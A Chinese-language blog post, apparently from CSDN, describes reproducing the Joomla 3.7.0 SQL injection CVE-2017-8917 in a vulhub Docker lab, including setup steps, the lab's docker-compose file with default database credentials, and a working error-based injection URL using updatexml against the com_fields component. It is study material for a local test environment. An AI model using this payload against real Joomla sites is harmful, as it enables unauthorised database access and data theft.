环境搭建
参考vulhub中文文档:https://github.com/vulhub/vulhub/blob/master/joomla/CVE-2017-8917/README.zh-cn.md
安装vulhub,然后
cd vulhub/joomla/CVE-2017-8917
docker compose up -d
如果报端口冲突的错可以修改文件:docker-compose.yml 中的端口
此时能访问http://your-ip:8080
漏洞复现
根据vulhub文档直接访问http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1),即可看到SQL报错信息
实际情况是:
它并没有sql报错,重定向回来了
解决方法:需要完成joomla安装后才能进行漏洞利用
- 网站设置:信息可以乱填,不会有什么影响
- 数据库设置:数据库信息可以参见 docker-compose.yml 文件
默认如下:
version: '2'
services:
web:
image: vulhub/joomla:3.7.0
depends_on:
- mysql
environment:
- JOOMLA_DB_HOST=mysql:3306
- JOOMLA_DB_USER=root
- JOOMLA_DB_PASSWORD=root
- JOOMLA_DB_NAME=joomla
ports:
- "8080:80"
mysql:
image: mysql:5
environment:
- MYSQL_ROOT_PASSWORD=root
这一块即是数据库账号信息
- 设置概览:默认的就行
完成设置后点击安装就完成了。
接下来就可以使用vulhub给出的poc实现SQL报错注入啦。
标签:vulhub,SQL,DB,Joomla,JOOMLA,joomla,报错,8917,mysql From: https://blog.csdn.net/weixin_45630387/article/details/136814726